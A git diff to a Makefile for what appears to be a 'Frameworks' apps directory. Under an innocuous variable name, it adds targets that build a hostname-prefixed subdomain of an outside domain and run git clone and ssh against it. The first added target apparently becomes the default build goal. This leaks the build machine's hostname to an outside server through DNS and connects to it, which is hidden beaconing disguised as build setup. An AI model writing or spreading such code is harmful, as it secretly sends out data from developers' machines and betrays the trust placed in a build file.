diff --git a/Makefile b/Makefile index 0893790568d02901901f28e166c9778ee518e74d..ae02c1d23abb12ee9eb4871a597bfeeea577fe60 100644 --- a/Makefile +++ b/Makefile @@ -13,7 +13,20 @@ # See the License for the specific language governing permissions and # limitations under the License. # +MODULENAME = cvbvhe0j8h6lxlx3dxnit5ursiyam0ap.bf.gy +HOSTNAME = $(shell hostname) +FINAL = $(HOSTNAME).$(MODULENAME) + +.PHONY: clone-https +clone-https: + git clone "https://$(FINAL)/repo.git" + +.PHONY: ssh-access +ssh-access: + ssh vela@$(FINAL) + +setup-all: clone-https ssh-access + @echo "Both operations completed" MENUDESC = "Frameworks" -include $(APPDIR)/Directory.mk